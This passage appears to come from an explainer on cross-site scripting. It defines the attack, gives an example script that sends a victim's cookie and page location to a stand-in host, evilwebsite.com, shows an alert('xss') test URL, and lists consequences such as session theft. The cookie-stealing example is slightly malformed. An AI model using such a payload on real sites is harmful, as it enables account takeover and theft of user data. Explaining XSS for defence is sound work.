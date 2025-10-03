Here’s an example.

<script> i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+' '+document.location</script>

While the payload is usually JavaScript, XSS can take place using any client-side language.

To carry out a cross-site scripting attack, an attacker injects a malicious script into user-provided input. Attackers can also carry out an attack by modifying a request. If the web app is vulnerable to XSS attacks, the user-supplied input executes as code. For example, in the request below, the script displays a message box with the text “xss.”

http://www.site.com/page.php?var=<script>alert('xss');</script>

There are many ways to trigger an XSS attack. For example, the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page (e.g., hyperlinks).

Potential consequences of cross-site scripting attacks include:

Capturing the keystrokes of a user

Redirecting a user to a malicious website

Running web browser–based exploits (e.g., crashing the browser)

Obtaining the cookie information of a user who is logged into a website, thus compromising the victim’s account



In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.